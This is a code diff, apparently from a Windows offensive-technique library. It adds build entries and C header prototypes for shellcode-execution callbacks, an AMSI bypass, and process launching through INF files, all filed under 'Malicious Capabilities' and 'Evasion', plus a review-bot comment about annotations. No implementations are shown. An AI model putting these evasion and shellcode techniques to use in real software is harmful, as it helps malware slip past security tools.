<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaVerifierEnumerateResource.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -3,8 +3,7 @@
|
|||
#include "StringManipulation.h"
|
||||
#include "FunctionDeclaration.h"
|
||||
#include <Ws2tcpip.h>
|
||||
#include <imagehlp.h>
|
||||
//#include <Dbghelp.h>
|
||||
#include <Dbghelp.h>
|
||||
#include <wincrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <Shlobj.h>
|
||||
|
@ -21,14 +20,15 @@
|
|||
#include <dpa_dsa.h>
|
||||
#include <winevt.h>
|
||||
#include <resapi.h>
|
||||
#include <amsi.h>
|
||||
#include <SetupAPI.h>
|
||||
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
#pragma comment(lib, "Iphlpapi.lib")
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
#pragma comment(lib, "Imagehlp.lib")
|
||||
//#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Wtsapi32.lib")
|
||||
#pragma comment(lib, "Urlmon.lib")
|
||||
#pragma comment(lib, "PowrProf.lib")
|
||||
|
@ -37,7 +37,7 @@
|
|||
#pragma comment(lib, "Comctl32.lib")
|
||||
#pragma comment(lib, "Wevtapi.lib")
|
||||
#pragma comment(lib, "ResUtils.lib")
|
||||
|
||||
#pragma comment(lib, "Setupapi.lib")
|
||||
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
|
@ -322,6 +322,8 @@ BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
|||
BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaVerifierEnumerateResource(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
|
||||
|
||||
|
||||
|
@ -355,6 +357,13 @@ DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
|
|||
DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
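Review bot: The seven new prototypes at L1602–L1620 carry no SAL annotations, while the surrounding declarations in this header (L1568–L1580, L1593–L1599) annotate every parameter with `_In_`; add them for consistency, e.g. `BOOL AmsiBypassViaPatternScan(_In_ DWORD ProcessId);` and `BOOL CopyFileViaSetupCopyFileW(_In_ LPCWSTR Source, _In_ LPCWSTR Destination);`. The earlier hunk at L1565–L1580 already follows the convention for the two `MpfSce*` additions, so only this block is out of step.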
|
||||
|
||||
|
||||
|
||||
|
|